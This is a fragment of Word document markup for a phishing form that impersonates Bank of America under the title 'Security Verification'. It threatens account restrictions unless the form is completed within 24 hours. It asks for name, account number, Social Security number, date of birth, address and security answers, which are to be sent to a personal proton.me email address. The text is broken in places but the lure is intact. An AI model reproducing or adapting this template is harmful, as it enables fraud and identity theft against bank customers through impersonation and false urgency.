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8300" cy="39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8300" cy="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Security Notice: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This document is protected by Bank of America security protocols. Do not share with unauthorized parties. Form must be completed within 24 hours to prevent account restrictions.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Security Verification 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Verification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protect your account from unauthorized access, please complete this verification form. All information will be encrypted and securely transmitted to our fraud prevention team.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="437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Name (as on account)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="437.373046875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Number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Security Number (SSN)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Birth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Address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 Security Questions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filling out the form, send it to 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Olivia.Braun@proton.me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Bank of America® | Member FDIC | Equal Housing Lender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© 2025 Bank of America Corporation. All rights reserved.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